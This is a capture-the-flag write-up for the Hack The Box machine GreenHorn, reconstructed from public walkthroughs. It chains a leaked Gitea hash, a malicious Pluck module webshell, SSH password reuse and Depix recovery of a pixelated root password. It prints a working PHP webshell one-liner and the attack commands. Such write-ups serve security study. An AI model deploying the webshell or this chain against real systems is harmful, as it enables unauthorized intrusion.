greenhorn

Summary

This writeup is reconstructed from public walkthroughs (see Source attribution below). I have not personally rooted this box.

GreenHorn is an Easy Linux box: Gitea exposes Pluck CMS source including admin SHA512 hash from data/settings/pass.php → crack via CrackStation. Pluck admin → install malicious module zip → webshell as www-data. Pluck admin password reused for junior SSH. junior’s home has Using OpenVAS.pdf with a pixelated root password; Depix recovers the redaction → su to root.

The chain:

Gitea repo → data/settings/pass.php → SHA512 hash → CrackStation → admin password.
Pluck admin upload module → webshell as www-data.
Same password for junior user → SSH.
PDF in junior’s home has a pixelated root password redaction. Use Depix (Bishop Fox) with a Notepad/Win10 reference image to recover the plaintext.
su - → root.

Recon

22/tcp     OpenSSH
80/tcp     Apache → Pluck CMS 4.7.18
3000/tcp   Gitea (Pluck source mirror)

Foothold — pluck source + admin module install

# clone Gitea repos publicly visible
git clone http://greenhorn.htb:3000/junior/Pluck-website
grep -r 'pass' Pluck-website/data/settings/
# pass.php: $pass = 'sha512(...)';
# CrackStation -> <admin password>

evil/
  evil.php   <?php system($_GET['c']); ?>
zip evil.zip evil/

/data/modules/evil/evil.php?c=id → www-data.

User pivot — password reuse

ssh junior@<TARGET>
Password: <admin-pluck-pw>

Root — Depix on PDF

$ ls /home/junior
Using\ OpenVAS.pdf
$ pdfimages 'Using OpenVAS.pdf' out
# extract pixelated image
$ depix -p out-001.png \
   -s images/searchimages/debruinseq_notepad_NotepadPlusPlus.png \
   -o recovered.png
# OCR recovered.png -> "sidefromsidetheothersidesidefromsidetheotherside"
$ su -

Why each step worked

Gitea exposing source: developer convenience; settings file with credentials.
SHA512 + dictionary password: even a “strong” hash algorithm doesn’t help when the input is rockyou-class.
Pluck module install = code execution: by-design.
Password reuse → OS user: classic.
Depix vs pixelation: pixelation is a deterministic blockwise average; with a known font, the inverse is searchable. Bishop Fox demonstrated this in 2020.

Counterfactuals

Don’t put credentials in committed source.
Use a real KDF (bcrypt, argon2id) + strong password.
Pluck admin is RCE-equivalent; protect it.
Don’t pixelate redactions; use solid black boxes.

Source attribution

Reconstruction is grounded in:

0xdf, “HTB: GreenHorn” — https://0xdf.gitlab.io/2024/12/07/htb-greenhorn.html
IppSec, “GreenHorn” video walkthrough — https://ippsec.rocks/?#GreenHorn
Bishop Fox / Depix project documentation.

I have not personally rooted this box; the chain above is a study-guide reconstruction of those public sources.